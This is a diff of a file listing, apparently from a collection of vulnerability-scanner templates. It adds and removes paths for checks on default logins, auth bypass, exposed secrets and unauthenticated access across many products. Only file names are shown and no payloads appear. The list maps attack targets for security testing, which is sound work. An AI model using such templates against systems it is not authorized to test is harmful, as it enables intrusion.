./poc/auth/aws-access-key.yaml
-./poc/auth/aws-opensearch-login-650.yaml
+./poc/auth/aws-opensearch-login-649.yaml
./poc/auth/aws-opensearch-login.yaml
./poc/auth/aws-secrets.yaml
./poc/auth/axiom-digitalocean-key-exposure-665.yaml
./poc/auth/axiom-digitalocean-key-exposure-666.yaml
-./poc/auth/axiom-digitalocean-key-exposure-667.yaml
./poc/auth/axiom-digitalocean-key-exposure-668.yaml
+./poc/auth/axiom-digitalocean-key-exposure.yaml
./poc/auth/axis2-default-login-1.yaml
./poc/auth/axis2-default-login-2.yaml
./poc/auth/axis2-default-login.yaml
@@ -1565,9 +1544,9 @@
./poc/auth/axublog-v1-cookiebypass.yaml
./poc/auth/azkaban-default-login-671.yaml
./poc/auth/azkaban-default-login-672.yaml
-./poc/auth/azkaban-default-login-673.yaml
./poc/auth/azkaban-default-login-674.yaml
./poc/auth/azkaban-default-login-675.yaml
+./poc/auth/azkaban-default-login.yaml
./poc/auth/azkaban-default-password.yaml
./poc/auth/azkaban-web-client-default-creds.yaml
./poc/auth/azure-apim-secret-key-disclosure.yaml
@@ -1575,14 +1554,15 @@
./poc/auth/bang-resto-weak-password.yaml
./poc/auth/bangyong-pm2-global_userlogin-sqli-rce.yaml
./poc/auth/basic-auth-detect.yaml
-./poc/auth/basic-auth-detection-687.yaml
./poc/auth/basic-auth-detection-688.yaml
+./poc/auth/basic-auth-detection-689.yaml
./poc/auth/basic-auth-detection-691.yaml
./poc/auth/basic-auth-detection.yaml
./poc/auth/baw-login-logout-menu-321724627690a73c1b0fd584b423f0df.yaml
./poc/auth/baw-login-logout-menu.yaml
./poc/auth/bazarr-login-700.yaml
./poc/auth/bazarr-login-701.yaml
+./poc/auth/bazarr-login-702.yaml
./poc/auth/bazarr-login.yaml
./poc/auth/bbpress-login-register-links-on-forum-topic-pages-0c04f03046971ace3308f75f8502712f.yaml
./poc/auth/bbpress-login-register-links-on-forum-topic-pages-4cedc7b2a0c00a81096cf3fcc283b780.yaml
@@ -1609,8 +1589,8 @@
./poc/auth/beyondtrust-login-server-718.yaml
./poc/auth/beyondtrust-login-server.yaml
./poc/auth/bigant-login-panel.yaml
+./poc/auth/bigbluebutton-login-724.yaml
./poc/auth/bigbluebutton-login-725.yaml
-./poc/auth/bigbluebutton-login-726.yaml
./poc/auth/bigbluebutton-login.yaml
./poc/auth/bigfix-login.yaml
./poc/auth/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml
@@ -1637,9 +1617,9 @@
./poc/auth/blossom-spa.yaml
./poc/auth/blossomthemes-email-newsletter-7dc6edac570bf028c64b4de6d220672b.yaml
./poc/auth/blossomthemes-email-newsletter.yaml
-./poc/auth/blue-iris-login-751.yaml
./poc/auth/blue-iris-login-752.yaml
./poc/auth/blue-iris-login-753.yaml
+./poc/auth/blue-iris-login-754.yaml
./poc/auth/blue-iris-login.yaml
./poc/auth/bluet-keywords-tooltip-generator-71ffb92be6862dd3422bd8a61ad3a3ae.yaml
./poc/auth/bluet-keywords-tooltip-generator-9f8dfb534ce422b5a9c6344470f1b6e5.yaml
@@ -1649,11 +1629,10 @@
./poc/auth/bomgar-login-panel.yaml
./poc/auth/braintree-access-token-772.yaml
./poc/auth/braintree-access-token-773.yaml
-./poc/auth/braintree-access-token.yaml
./poc/auth/branch-key-774.yaml
./poc/auth/branch-key.yaml
./poc/auth/brother-unauthorized-access-791.yaml
-./poc/auth/brother-unauthorized-access-792.yaml
+./poc/auth/brother-unauthorized-access-793.yaml
./poc/auth/brother-unauthorized-access.yaml
./poc/auth/brute-force-login-protection-20bc35cc9dd5149e33075d4261e715a7.yaml
./poc/auth/brute-force-login-protection.yaml
@@ -1668,9 +1647,9 @@
./poc/auth/camunda-login-panel-1.yaml
./poc/auth/camunda-login-panel-2.yaml
./poc/auth/camunda-login-panel.yaml
+./poc/auth/canal-default-login-846.yaml
./poc/auth/canal-default-login-847.yaml
./poc/auth/canal-default-login-848.yaml
-./poc/auth/canal-default-login-849.yaml
./poc/auth/canal-default-login.yaml
./poc/auth/captcha-code-authentication-198c2fa27cc518c127d49255679341f9.yaml
./poc/auth/captcha-code-authentication-c7faba710d318637d4639fc04a02d42a.yaml
@@ -1715,7 +1694,6 @@
./poc/auth/check-register_argc_argv.yaml
./poc/auth/checkmk-login.yaml
./poc/auth/chefio-login-check.yaml
-./poc/auth/chinaunicom-default-login-906.yaml
./poc/auth/chinaunicom-default-login-907.yaml
./poc/auth/chinaunicom-default-login-908.yaml
./poc/auth/chinaunicom-default-login-909.yaml
@@ -1725,16 +1703,16 @@
./poc/auth/chinaunicom-modem-default-password.yml
./poc/auth/ciphertrust-default-password-vulnerability.yaml
./poc/auth/circarlife-default-login.yaml
-./poc/auth/cisco-finesse-login-938.yaml
./poc/auth/cisco-finesse-login-939.yaml
+./poc/auth/cisco-finesse-login-940.yaml
./poc/auth/cisco-finesse-login.yaml
./poc/auth/cisco-integrated-login-941.yaml
./poc/auth/cisco-integrated-login-942.yaml
./poc/auth/cisco-integrated-login.yaml
+./poc/auth/cisco-systems-login-973.yaml
./poc/auth/cisco-systems-login-974.yaml
-./poc/auth/cisco-systems-login-975.yaml
./poc/auth/cisco-systems-login.yaml
-./poc/auth/cisco-ucs-kvm-login-980.yaml
+./poc/auth/cisco-ucs-kvm-login-979.yaml
./poc/auth/cisco-ucs-kvm-login.yaml
./poc/auth/cisco-vmanage-login.yaml
./poc/auth/citrix-cve-2020-8193-unauthorized.yml
@@ -1757,7 +1735,7 @@
./poc/auth/clickhouse-api-unauth.yaml
./poc/auth/clickhouse-db-unauth.yaml
./poc/auth/clickhouse-server-Unauthorized-Sql.yaml
-./poc/auth/clickhouse-unauth-1003.yaml
+./poc/auth/clickhouse-unauth-1002.yaml
./poc/auth/clickhouse-unauth-1004.yaml
./poc/auth/clickhouse-unauth-api.yaml
./poc/auth/clickhouse-unauth.yaml
@@ -1781,15 +1759,13 @@
./poc/auth/co-authors-plus-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/auth/co-authors-plus-plugin.yaml
./poc/auth/co-authors-plus.yaml
-./poc/auth/cobbler-default-login-1119.yaml
+./poc/auth/cobbler-default-login-1118.yaml
./poc/auth/cobbler-default-login-1120.yaml
./poc/auth/cobbler-default-login-1121.yaml
-./poc/auth/cobbler-default-login.yaml
./poc/auth/code-climate-token.yaml
./poc/auth/code-server-login.yaml
./poc/auth/codecov-access-token.yaml
./poc/auth/codepen-login-check.yaml
-./poc/auth/codian-mcu-login-1139.yaml
./poc/auth/codian-mcu-login-1140.yaml
./poc/auth/coinbase-access-token.yaml
./poc/auth/coldfusion-administrator-login-1144.yaml
@@ -1802,6 +1778,7 @@
./poc/auth/commax-biometric-auth-bypass-1157.yaml
./poc/auth/commax-credentials-disclosure-1158.yaml
./poc/auth/commax-credentials-disclosure-1159.yaml
+./poc/auth/commax-credentials-disclosure-1160.yaml
./poc/auth/composer-auth-json.yaml
./poc/auth/comtrend-password-exposure-1166.yaml
./poc/auth/comtrend-password-exposure-1167.yaml
@@ -1880,12 +1857,13 @@
./poc/auth/credential-exposure-file.yaml
./poc/auth/credential-exposure.yaml
./poc/auth/credentials (copy 1).yaml
-./poc/auth/credentials-1258.yaml
+./poc/auth/credentials-1257.yaml
./poc/auth/credentials-1259.yaml
./poc/auth/credentials-disclosure-1252.yaml
./poc/auth/credentials-disclosure-1253.yaml
./poc/auth/credentials-disclosure-1254.yaml
./poc/auth/credentials-disclosure-1255.yaml
+./poc/auth/credentials-disclosure-1256.yaml
./poc/auth/credentials-disclosure-all.yaml
./poc/auth/credentials-json.yaml
./poc/auth/credentials.yaml
@@ -1895,12 +1873,15 @@
./poc/auth/credova-financial.yaml
./poc/auth/crush-ftp-login-1273.yaml
./poc/auth/crush-ftp-login-1274.yaml
+./poc/auth/crush-ftp-login-1275.yaml
./poc/auth/crush-ftp-login.yaml
./poc/auth/crushftp-anonymous-login.yaml
+./poc/auth/crushftp-default-login.yaml
./poc/auth/cs-cart-unauthenticated-lfi-1281.yaml
./poc/auth/cs-cart-unauthenticated-lfi-1282.yaml
./poc/auth/cs-cart-unauthenticated-lfi-1283.yaml
-./poc/auth/cs-cart-unauthenticated-lfi-1285.yaml
+./poc/auth/cs-cart-unauthenticated-lfi-1284.yaml
+./poc/auth/cs-cart-unauthenticated-lfi.yaml
./poc/auth/cs141-default-login-1.yaml
./poc/auth/cs141-default-login-1277.yaml
./poc/auth/cs141-default-login-1279.yaml
@@ -1974,16 +1955,15 @@
./poc/auth/dbeaver-credentials-6777.yaml
./poc/auth/dbeaver-credentials-6778.yaml
./poc/auth/dbeaver-credentials-6779.yaml
-./poc/auth/dbeaver-credentials-6780.yaml
./poc/auth/dbeaver-credentials-6781.yaml
./poc/auth/dbeaver-credentials-6782.yaml
./poc/auth/dell-emc-ecom-default-credentials-6917.yaml
./poc/auth/dell-emc-ecom-default-credentials.yaml
./poc/auth/dell-idrac-default-login-6942.yaml
-./poc/auth/dell-idrac-default-login-6943.yaml
./poc/auth/dell-idrac-default-login-6944.yaml
./poc/auth/dell-idrac-default-login-6945.yaml
./poc/auth/dell-idrac-default-login-6946.yaml
+./poc/auth/dell-idrac-default-login.yaml
./poc/auth/dell-idrac9-default-login-6930.yaml
./poc/auth/dell-idrac9-default-login-6931.yaml
./poc/auth/dell-idrac9-default-login-6932.yaml
@@ -1994,9 +1974,7 @@
./poc/auth/dell-openmanager-login-1.yaml
./poc/auth/dell-openmanager-login-2.yaml
./poc/auth/dell-openmanager-login-6948.yaml
-./poc/auth/dell-openmanager-login-6949.yaml
./poc/auth/dell-openmanager-login-6950.yaml
-./poc/auth/dell-openmanager-login-6951.yaml
./poc/auth/dell-openmanager-login.yaml
./poc/auth/dell-remote-power-management-default-login.yaml
./poc/auth/dell-wyse-login-6952.yaml
@@ -2019,6 +1997,7 @@
./poc/auth/dir-100-login-panel.yaml
./poc/auth/dir-600-login-panel.yaml
./poc/auth/dir-850l-login-panel.yaml
+./poc/auth/directadmin-login-panel-7000.yaml
./poc/auth/directadmin-login-panel-7001.yaml
./poc/auth/directadmin-login-panel.yaml
./poc/auth/directum-login.yaml
@@ -2028,7 +2007,7 @@
./poc/auth/discord-cilent-secret.yaml
./poc/auth/discuz-wechat-plugins-unauth.yaml
./poc/auth/discuz-wechat-plugins-unauth.yml
-./poc/auth/django-secret-key.yaml
+./poc/auth/django-secret.key.yaml
./poc/auth/dlink-850l-password-leak.yaml
./poc/auth/dlink-ac-centralized-management-system-default-login.yaml
./poc/auth/dlink-ac-default-password.yaml
@@ -2050,6 +2029,7 @@
./poc/auth/dologin-plugin.yaml
./poc/auth/dologin.yaml
./poc/auth/dolphinscheduler-default-login-7072.yaml
+./poc/auth/dolphinscheduler-default-login-7073.yaml
./poc/auth/doppler-api-token.yaml
./poc/auth/dpt-oauth-client-c816cf65f82ebdf2ade35164058fc67e.yaml
./poc/auth/dpt-oauth-client-f37b20b98f49a19d8d00195f0b6db9ea.yaml
@@ -2088,22 +2068,22 @@
./poc/auth/drupal_module-super_login-cross-site-scripting.yaml
./poc/auth/drupal_module-token_custom-arbitrary-php-code-execution.yaml
./poc/auth/drupal_module-yubikey-access-bypass.yaml
+./poc/auth/dubbo-admin-default-login-7120.yaml
./poc/auth/dubbo-admin-default-login-7121.yaml
-./poc/auth/dubbo-admin-default-login.yaml
./poc/auth/dubbo-admin-default-password.yaml
./poc/auth/dubbo-admin-default-password.yml
./poc/auth/duffel-api-token.yaml
./poc/auth/dvwa-default-login-7126.yaml
-./poc/auth/dvwa-default-login-7127.yaml
./poc/auth/dvwa-default-login-7128.yaml
./poc/auth/dvwa-default-login-7129.yaml
-./poc/auth/dvwa-headless-automatic-login-7130.yaml
+./poc/auth/dvwa-default-login.yaml
+./poc/auth/dvwa-headless-automatic-login-7131.yaml
./poc/auth/dvwa-headless-automatic-login-7132.yaml
./poc/auth/dvwa-headless-automatic-login-7133.yaml
./poc/auth/dvwa-headless-automatic-login.yaml
./poc/auth/dynamically-register-sidebars-a3329eaa025f4bd78463fd98e337add9.yaml
./poc/auth/dynamically-register-sidebars.yaml
-./poc/auth/dynatrace-token-7146.yaml
+./poc/auth/dynatrace-token-7145.yaml
./poc/auth/dynatrace-token.yaml
./poc/auth/e-cology-verify-quick-login-user-login.yaml
./poc/auth/e-learning-system-authentication-bypass-rce.yaml
@@ -2163,13 +2143,12 @@
./poc/auth/electric-studio-client-login-f80c5406ebadb06c127dd29569b85330.yaml
./poc/auth/electric-studio-client-login.yaml
./poc/auth/email-verification-token-bypass.yaml
-./poc/auth/emcecom-default-login-7211.yaml
./poc/auth/emcecom-default-login-7212.yaml
./poc/auth/emcecom-default-login-7213.yaml
./poc/auth/emcecom-default-login-7214.yaml
./poc/auth/emqx-default-login-7221.yaml
+./poc/auth/emqx-default-login-7222.yaml
./poc/auth/emqx-default-login.yaml
-./poc/auth/ems-login-panel-7223.yaml
./poc/auth/ems-login-panel-7224.yaml
./poc/auth/ems-login-panel-7225.yaml
./poc/auth/ems-login-panel.yaml
@@ -2179,7 +2158,6 @@
./poc/auth/epmp-login-7228.yaml
./poc/auth/epmp-login-7229.yaml
./poc/auth/epmp-login-7230.yaml
-./poc/auth/epmp-login.yaml
./poc/auth/epson-unauthorized-access-detect.yaml
./poc/auth/erident-custom-login-and-dashboard-0e2a68c6bc5c7e524706a5b5493bef90.yaml
./poc/auth/erident-custom-login-and-dashboard-65d615ac22cc89343ec17e71c91783a6.yaml
@@ -2193,8 +2171,6 @@
./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml
./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml
./poc/auth/esxi-unauthorized-access.yaml
-./poc/auth/etcd-keys-7261.yaml
-./poc/auth/etcd-keys-7262.yaml
./poc/auth/etcd-keys.yaml
./poc/auth/etcd-unauth.yaml
./poc/auth/etcd-unauth.yml
@@ -2220,7 +2196,7 @@
./poc/auth/exacqvision-default-login-7274.yaml
./poc/auth/exacqvision-default-login-7275.yaml
./poc/auth/exacqvision-default-login-7276.yaml
-./poc/auth/exacqvision-default-login-7277.yaml
+./poc/auth/exacqvision-default-login.yaml
./poc/auth/exacqvision-default-password.yaml
./poc/auth/exchange-addon-authorize-net-d43cc9eb0f6efba271859825f9179410.yaml
./poc/auth/exchange-addon-authorize-net.yaml
@@ -2237,7 +2213,6 @@
./poc/auth/facebook-api-token.yaml
./poc/auth/facebook-secret-7386.yaml
./poc/auth/facebook-secret.yaml
-./poc/auth/facebook-secrets.yaml
./poc/auth/fake-auth-bypass.yaml
./poc/auth/fake-auth-header-auth-bypass.yaml
./poc/auth/fake-referer-header-auth-bypass.yaml
@@ -2249,13 +2224,11 @@
./poc/auth/fanwei-unauth.yaml
./poc/auth/faraday-login-7393.yaml
./poc/auth/faraday-login-7394.yaml
-./poc/auth/faraday-login-7395.yaml
./poc/auth/faraday-login-7396.yaml
-./poc/auth/faraday-login-7397.yaml
./poc/auth/faraday-login.yaml
./poc/auth/fastly-api-token.yaml
+./poc/auth/fatpipe-auth-bypass-7431.yaml
./poc/auth/fatpipe-auth-bypass-7432.yaml
-./poc/auth/fatpipe-auth-bypass.yaml
./poc/auth/fb-access-token.yaml
./poc/auth/fcm-api-key.yaml
./poc/auth/fcm-server-key-7450.yaml
@@ -2288,9 +2261,9 @@
./poc/auth/flir-ax8-default-credentials-7512.yaml
./poc/auth/flir-ax8-default-credentials.yaml
./poc/auth/flir-default-login-7513.yaml
-./poc/auth/flir-default-login-7514.yaml
./poc/auth/flir-default-login-7515.yaml
./poc/auth/flir-default-login-7516.yaml
+./poc/auth/flir-default-login.yaml
./poc/auth/flir-login.yaml
./poc/auth/fortiauthenticator-detect.yaml
./poc/auth/fortitester-login-panel.yaml
@@ -2298,18 +2271,16 @@
./poc/auth/frp-dashboard-unauth.yml
./poc/auth/frp-default-credentials-7555.yaml
./poc/auth/frp-default-credentials.yaml
-./poc/auth/frp-default-login-7556.yaml
./poc/auth/frp-default-login-7557.yaml
./poc/auth/frp-default-login-7558.yaml
./poc/auth/frp-default-login-7559.yaml
./poc/auth/frp-unauthenticated.yaml
./poc/auth/ftp-anonymous-login.yaml
./poc/auth/ftp-credentials-exposure-7567.yaml
-./poc/auth/ftp-credentials-exposure-7568.yaml
+./poc/auth/ftp-credentials-exposure.yaml
./poc/auth/ftp-default-credentials.yaml
./poc/auth/ftp-default-creds.yaml
./poc/auth/ftp-weak-credentials-7569.yaml
-./poc/auth/ftp-weak-credentials-7570.yaml
./poc/auth/ftp-weak-credentials.yaml
./poc/auth/fuelcms-default-login-7571.yaml
./poc/auth/fuelcms-default-login-7572.yaml
@@ -2346,8 +2317,9 @@
./poc/auth/git-credentials-7643.yaml
./poc/auth/git-credentials-7644.yaml
./poc/auth/git-credentials-disclosure-7639.yaml
-./poc/auth/git-credentials-disclosure-7640.yaml
+./poc/auth/git-credentials-disclosure-7641.yaml
./poc/auth/git-credentials-disclosure-7642.yaml
+./poc/auth/git-credentials-disclosure.yaml
./poc/auth/git-credentials.yaml
./poc/auth/gitea-login-7645.yaml
./poc/auth/gitea-login-check.yaml
@@ -2365,7 +2337,6 @@
./poc/auth/gitlab-pipeline-triggertoken.yaml
./poc/auth/gitlab-public-signup-7681.yaml
./poc/auth/gitlab-public-signup-7682.yaml
-./poc/auth/gitlab-public-signup-7683.yaml
./poc/auth/gitlab-public-signup-7684.yaml
./poc/auth/gitlab-public-signup.yaml
./poc/auth/gitlab-runner-regtoken.yaml
@@ -2379,7 +2350,6 @@
./poc/auth/gitlab-weak-login-7705.yaml
./poc/auth/gitlab-weak-login-7706.yaml
./poc/auth/gitlab-weak-login-7707.yaml
-./poc/auth/gitlab-weak-login.yaml
./poc/auth/gitter-token.yaml
./poc/auth/gloo-unauth-7722.yaml
./poc/auth/gloo-unauth-7724.yaml
@@ -2387,12 +2357,12 @@
./poc/auth/gloo-unauth.yaml
./poc/auth/glpi-authentication-7728.yaml
./poc/auth/glpi-authentication-7729.yaml
-./poc/auth/glpi-authentication-7730.yaml
./poc/auth/glpi-authentication.yaml
./poc/auth/glpi-default-credential.yaml
./poc/auth/glpi-default-login-7731.yaml
./poc/auth/glpi-default-login-7732.yaml
./poc/auth/glpi-default-login-7733.yaml
+./poc/auth/glpi-default-login.yaml
./poc/auth/glpi-login-1.yaml
./poc/auth/glpi-login-2.yaml
./poc/auth/glpi-login-7735.yaml
@@ -2400,7 +2370,6 @@
./poc/auth/glpi-login-7737.yaml
./poc/auth/glpi-login.yaml
./poc/auth/gmail-api-client-secrets-7740.yaml
-./poc/auth/gmail-api-client-secrets-7741.yaml
./poc/auth/gmail-api-client-secrets.yaml
./poc/auth/goanywhere-mft-login.yaml
./poc/auth/gocd-encryption-key-7750.yaml
@@ -2432,10 +2401,12 @@
./poc/auth/google-earth-dlogin-7778.yaml
./poc/auth/google-earth-dlogin-7779.yaml
./poc/auth/google-earth-dlogin-7780.yaml
+./poc/auth/google-earth-dlogin-7781.yaml
./poc/auth/google-earth-dlogin-7782.yaml
./poc/auth/google-earth-dlogin.yaml
./poc/auth/google-earthenterprise-weak-password.yaml
./poc/auth/google-oauth-clientsecret.yaml
+./poc/auth/google-secrets.yaml
./poc/auth/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml
./poc/auth/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml
./poc/auth/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -2446,7 +2417,7 @@
./poc/auth/gophish-default-login-7792.yaml
./poc/auth/gophish-default-login-7793.yaml
./poc/auth/gophish-default-login-7794.yaml
-./poc/auth/gophish-login-7795.yaml
+./poc/auth/gophish-login-7796.yaml
./poc/auth/gophish-login.yaml
./poc/auth/grafana-api-key-exposure.yaml
./poc/auth/grafana-datasource-credentials-exposure.yml
@@ -2463,6 +2434,7 @@
./poc/auth/grafana-default-password.yaml
./poc/auth/grafana-default-password.yml
./poc/auth/grafana-login.yml
+./poc/auth/grafana-public-signup-7814.yaml
./poc/auth/grafana-public-signup-7815.yaml
./poc/auth/grafana-public-signup-7816.yaml
./poc/auth/grafana-public-signup-7817.yaml
@@ -2472,6 +2444,7 @@
./poc/auth/gryphon-login.yaml
./poc/auth/gt-ac2900-login.yaml
./poc/auth/guacamole-default-login-7858.yaml
+./poc/auth/guacamole-default-login-7859.yaml
./poc/auth/guacamole-default-login-7860.yaml
./poc/auth/guacamole-default-login-7861.yaml
./poc/auth/guest-author-25a9f786708949ed3cefc36430f46236.yaml
@@ -2522,8 +2495,8 @@
./poc/auth/homeworks-illumination-web-keypad.yaml
./poc/auth/hongdian-default-login-1.yaml
./poc/auth/hongdian-default-login-2.yaml
+./poc/auth/hongdian-default-login-7997.yaml
./poc/auth/hongdian-default-login-7998.yaml
-./poc/auth/hongdian-default-login-7999.yaml
./poc/auth/hongdian-default-password-1.yaml
./poc/auth/hongdian-default-password-2.yaml
./poc/auth/horde-login-panel.yaml
@@ -2536,8 +2509,8 @@
./poc/auth/houzez-login-register-bb43e7e2104f92ffb17608db5afe8e6a.yaml
./poc/auth/houzez-login-register.yaml
./poc/auth/hp-ilo-serial-key-disclosure-8022.yaml
-./poc/auth/hp-ilo-serial-key-disclosure-8023.yaml
./poc/auth/hp-ilo-serial-key-disclosure-8024.yaml
+./poc/auth/hp-ilo-serial-key-disclosure-8025.yaml
./poc/auth/hp-ilo-serial-key-disclosure.yaml
./poc/auth/hp-switch-default-login-8035.yaml
./poc/auth/hp-switch-default-login-8036.yaml
@@ -2545,21 +2518,22 @@
./poc/auth/hp-switch-default-login-8038.yaml
./poc/auth/hpe-system-management-login-8014.yaml
./poc/auth/hpe-system-management-login-8015.yaml
+./poc/auth/hpe-system-management-login-8017.yaml
./poc/auth/hpe-system-management-login.yaml
./poc/auth/hrsale-unauthenticated-lfi-8039.yaml
./poc/auth/hrsale-unauthenticated-lfi-8040.yaml
./poc/auth/hrsale-unauthenticated-lfi-8041.yaml
./poc/auth/htpasswd-detection-8045.yaml
+./poc/auth/htpasswd-detection-8046.yaml
./poc/auth/htpasswd-detection.yaml
./poc/auth/htpasswd.yaml
./poc/auth/http-auth-141b1b9924040b19c483025ca3d106e1.yaml
./poc/auth/http-auth.yaml
-./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml
./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml
+./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml
./poc/auth/http-username-password.yaml
./poc/auth/httponly-cookie-detect.yaml
./poc/auth/huawei-HG532e-default-login.yaml
-./poc/auth/huawei-HG532e-default-router-login.yaml
./poc/auth/huawei-auth-http-server-fileread.yaml
./poc/auth/huawei-auth-server.yaml
./poc/auth/huawei-dg8045-auth-bypass.yaml
@@ -2570,9 +2544,8 @@
./poc/auth/huawei-router-auth-bypass-8073.yaml
./poc/auth/huawei-router-auth-bypass-8074.yaml
./poc/auth/huawei-router-auth-bypass-8075.yaml
+./poc/auth/huawei-router-auth-bypass-8076.yaml
./poc/auth/hue-default-credential-8080.yaml
-./poc/auth/hue-default-credential-8081.yaml
-./poc/auth/hue-default-credential.yaml
./poc/auth/hue-login-panel.yaml
./poc/auth/iam-db-auth.yaml
./poc/auth/iam-key-rotation-90days.yaml
@@ -2589,8 +2562,8 @@
./poc/auth/ibm-mqseries-default-login-8108.yaml
./poc/auth/ibm-note-login-1.yaml
./poc/auth/ibm-note-login-2.yaml
-./poc/auth/ibm-note-login-8110.yaml
./poc/auth/ibm-note-login-8111.yaml
+./poc/auth/ibm-note-login-8112.yaml
./poc/auth/ibm-note-login.yaml
./poc/auth/ibm-signup-exposure-8119.yaml
./poc/auth/ibm-signup-exposure-8120.yaml
@@ -2599,16 +2572,15 @@
./poc/auth/ibm-storage-default-credential-8125.yaml
./poc/auth/ibm-storage-default-password.yaml
./poc/auth/icc-pro-login.yaml
+./poc/auth/icinga-web-login-8134.yaml
./poc/auth/icinga-web-login-8135.yaml
./poc/auth/icinga-web-login-8136.yaml
-./poc/auth/icinga-web-login-8137.yaml
./poc/auth/icinga-web-login.yaml
./poc/auth/ictprotege-login-panel.yaml
./poc/auth/idemia-biometrics-default-credentials.yaml
./poc/auth/idemia-biometrics-default-login-8138.yaml
-./poc/auth/idemia-biometrics-default-login-8139.yaml
./poc/auth/idemia-biometrics-default-login-8140.yaml
-./poc/auth/idemia-biometrics-default-login.yaml
+./poc/auth/idemia-biometrics-default-login-8141.yaml
./poc/auth/ikuai-login-panel.yaml
./poc/auth/imgproxy-unauth.yaml
./poc/auth/imm-default-login.yaml
@@ -2620,7 +2592,6 @@
./poc/auth/intelbras-login.yaml
./poc/auth/intelliflash-login-panel.yaml
./poc/auth/iptime-default-login-8192.yaml
-./poc/auth/iptime-default-login-8193.yaml
./poc/auth/iptime-default-login-8194.yaml
./poc/auth/issabel-login.yaml
./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml
@@ -2638,13 +2609,12 @@
./poc/auth/jamf-login.yaml
./poc/auth/jboss-default-password.yaml
./poc/auth/jboss-unauth.yml
-./poc/auth/jellyseerr-login-panel.yaml
./poc/auth/jenkins-credentials-disclosure.yml
./poc/auth/jenkins-default-login.yaml
./poc/auth/jenkins-default-pwd.yaml
-./poc/auth/jenkins-login-8277.yaml
./poc/auth/jenkins-login-8278.yaml
./poc/auth/jenkins-login-8279.yaml
+./poc/auth/jenkins-login-8280.yaml
./poc/auth/jenkins-login-detection.yaml
./poc/auth/jenkins-login.yaml
./poc/auth/jenkins-token.yaml
@@ -2652,6 +2622,7 @@
./poc/auth/jenkins-unauthorized-access.yml
./poc/auth/jenkins-weak-password.yaml
./poc/auth/jfrog-login.yaml
+./poc/auth/jfrog-unauth-build-exposed-8299.yaml
./poc/auth/jfrog-unauth-build-exposed-8300.yaml
./poc/auth/jfrog-unauth-build-exposed-8301.yaml
./poc/auth/jfrog-unauth-build-exposed-8302.yaml
@@ -2660,6 +2631,7 @@
./poc/auth/jinher-oa-c6-default-password.yaml
./poc/auth/jinher-oa-c6-default-password.yml
./poc/auth/jinher-oa-default-login-8311.yaml
+./poc/auth/jinher-oa-default-login-8312.yaml
./poc/auth/jira-login-default.yaml
./poc/auth/jira-service-desk-signup-8318.yaml
./poc/auth/jira-service-desk-signup-8319.yaml
@@ -2674,11 +2646,11 @@
./poc/auth/jira-unauthenticated-dashboards-8327.yaml
./poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml
./poc/auth/jira-unauthenticated-installed-gadgets-8329.yaml
-./poc/auth/jira-unauthenticated-popular-filters-8331.yaml
+./poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml
./poc/auth/jira-unauthenticated-popular-filters.yaml
-./poc/auth/jira-unauthenticated-projectcategories-8332.yaml
./poc/auth/jira-unauthenticated-projectcategories-8333.yaml
./poc/auth/jira-unauthenticated-projectcategories-8334.yaml
+./poc/auth/jira-unauthenticated-projectcategories.yaml
./poc/auth/jira-unauthenticated-projects-8335.yaml
./poc/auth/jira-unauthenticated-projects-8336.yaml
./poc/auth/jira-unauthenticated-resolutions-8337.yaml
@@ -2688,16 +2660,16 @@
./poc/auth/jira-unauthenticated-user-picker-8341.yaml
./poc/auth/jira-unauthenticated.yaml
./poc/auth/jmx-default-login-8354.yaml
-./poc/auth/jmx-default-login-8355.yaml
./poc/auth/jmx-default-login-8356.yaml
+./poc/auth/jmx-default-login.yaml
./poc/auth/jmx-default-password.yaml
./poc/auth/jolokia-tomcat-creds-leak.yaml
-./poc/auth/jolokia-unauthenticated-lfi-8364.yaml
./poc/auth/jolokia-unauthenticated-lfi-8365.yaml
+./poc/auth/jolokia-unauthenticated-lfi-8366.yaml
+./poc/auth/jolokia-unauthenticated-lfi.yaml
./poc/auth/jumpserver-unauth-rce.yaml
./poc/auth/jumpserver-unauth-rce.yml
./poc/auth/jumpserver-unauth.yaml
-./poc/auth/jupyter-ipython-unauth-8402.yaml
./poc/auth/jupyter-ipython-unauth-8404.yaml
./poc/auth/jupyter-ipython-unauth-8405.yaml
./poc/auth/jupyter-ipython-unauth.yaml
@@ -2706,33 +2678,33 @@
./poc/auth/jupyter-notebook-unauthorized-access.yaml
./poc/auth/jupyter-notebook-unauthorized-access.yml
./poc/auth/jupyterhub-default-login-8399.yaml
-./poc/auth/jupyterhub-default-login-8400.yaml
./poc/auth/jupyterhub-default-login-8401.yaml
./poc/auth/jwt-auth-095adf04b2058ec616033a7aa2b24d07.yaml
./poc/auth/jwt-auth.yaml
./poc/auth/jwt-detection.yaml
./poc/auth/jwt-token-8408.yaml
./poc/auth/jwt-token-8409.yaml
-./poc/auth/jwt-token-8410.yaml
+./poc/auth/jwt-token.yaml
./poc/auth/k8s-apiserver-unauthorized.yaml
./poc/auth/k8s-etcd-v3-unauthorized.yaml
./poc/auth/kafka-center-default-login-8415.yaml
./poc/auth/kafka-center-default-login-8416.yaml
./poc/auth/kafka-center-default-login-8417.yaml
+./poc/auth/kafka-center-default-login.yaml
./poc/auth/kafka-center-default-password.yaml
./poc/auth/kafka-center-login-8419.yaml
./poc/auth/kafka-center-login.yaml
./poc/auth/kafka-manager-unauth.yml
./poc/auth/kakao-login-phish.yaml
./poc/auth/kanboard-login.yaml
+./poc/auth/kasm-login-panel.yaml
./poc/auth/keenetic-web-login-8439.yaml
./poc/auth/keenetic-web-login-8440.yaml
./poc/auth/keenetic-web-login-8441.yaml
-./poc/auth/keenetic-web-login-8443.yaml
+./poc/auth/keenetic-web-login-8442.yaml
./poc/auth/keenetic-web-login.yaml
./poc/auth/kenesto-login-8445.yaml
./poc/auth/kenesto-login.yaml
-./poc/auth/kentico-login-8446.yaml
